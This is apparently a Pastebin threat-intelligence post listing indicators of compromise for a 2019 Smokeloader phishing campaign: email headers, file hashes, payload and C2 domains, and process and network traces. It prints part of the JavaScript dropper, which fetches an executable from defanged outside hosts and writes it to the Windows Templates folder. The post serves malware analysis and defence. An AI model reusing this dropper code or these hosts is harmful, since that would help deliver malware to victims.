Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #smokeloader #WSH #LZH
- https://pastebin.com/b8PkhMyN
- previous contact:
- https://pastebin.com/hkskwKvc
- https://pastebin.com/JmthzrL4
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- attack_vector
- --------------
- email attach (lzh) > js > WSH > GET 2 URL > AppData\Roaming\Microsoft\Windows\Templates\*.exe
- email_headers
- --------------
- Received: from mx.fm.ukrtelecom.ua (mx.fm.ukrtelecom.ua [82.207.79.108])
- by srv8.victim1.com for <user0@org7.victim1.com>;
- Fri, 11 Jan 2019 03:25:51 +0200 (EET) (envelope-from zagviddil@ukrpost.ua)
- Received: from mail5.ukrpost.ua (mail5.ukrpost.ua [82.207.79.5]) by mx.fm.ukrtelecom.ua
- Received: from [37.120.146.92] (helo=37.120.146.92)
- by mail5.ukrpost.ua (envelope-from <zagviddil@ukrpost.ua>)
- From: "Иван Богданович <zagviddil@ukrpost.ua>"
- Subject: Счет фактура за текущий месяц
- To: "user0" <user0@org7.victim1.com>
- Reply-To: "Иван Богданович <zagviddil@ukrpost.ua>" <inter4room@ukr.net>
- files
- --------------
- SHA-256 ecac0091a03fbf8f1583254af92c850a3740c79ecd22659ab0ec7447b399bdbd
- File name Счета по текущему 11.01.2019.lzh [LHarc 1.x/ARX archive data [lh0]]
- File size 42 KB
- SHA-256 3b97d0ef429100c6ec88d1ecca237eff66887db9e76223ce586f47f5fc1b568a
- File name Pax. 052-2019.ods [OpenDocument Spreadsheet]
- File size 15.71 KB
- SHA-256 69a9d87277f8cd364f68187c08235b4d61c47b7021e87f9d742c55a03223289c
- File name Pax. 052-2019.js [ASCII text]
- File size 26.21 KB
- SHA-256 fd630b999bda6ccd94747d8c33869c3bfb20a0ab546464821a67509d2a79d38a
- File name liter.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 205 KB
- activity
- **************
- dropper_script:
- wsh = new ActiveXObject("wscript.shell");
- path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
- HTTP = new ActiveXObject("MSXML2.XMLHTTP"); Stream = new ActiveXObject("ADODB.Stream");
- HTTP.Open("GET", "musicaustriallc{.} ru/instadoc/liter.exe", false);
- ...
- else { HTTP.Open("GET", "telemagistralinc{.} info/instadoc/liter.exe", false);
- ...
- PL musicaustriallc{.} ru/instadoc/liter.exe
- telemagistralinc{.} info/instadoc/liter.exe
- C2 aviatorssm{.} bit/
- netwrk
- --------------
- 176.53.161.28 musicaustriallc{.} ru GET /instadoc/liter.exe HTTP/1.1 Mozilla/4.0
- This program cannot be run in DOS mode.
- comp
- --------------
- wscript.exe 968 TCP 176.53.161.28 80 ESTABLISHED
- proc
- --------------
- C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 052-2019.js
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\250221.exe
- persist
- --------------
- n/a (detects vm, sleeps)
- drop
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\250221.exe
- # # #
- https://www.virustotal.com/#/file/ecac0091a03fbf8f1583254af92c850a3740c79ecd22659ab0ec7447b399bdbd/details
- https://www.virustotal.com/#/file/3b97d0ef429100c6ec88d1ecca237eff66887db9e76223ce586f47f5fc1b568a/details
- https://www.virustotal.com/#/file/69a9d87277f8cd364f68187c08235b4d61c47b7021e87f9d742c55a03223289c/details
- https://www.virustotal.com/#/url/e9094e4d3a4b8c94425d33c6c423fc5e7ad9aba7f45ab4931d215aadb7d9111d/details
- https://www.virustotal.com/#/file/fd630b999bda6ccd94747d8c33869c3bfb20a0ab546464821a67509d2a79d38a/details
- https://analyze.intezer.com/#/analyses/051ebb20-165d-40b6-923d-a6eb78c9cdb7
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement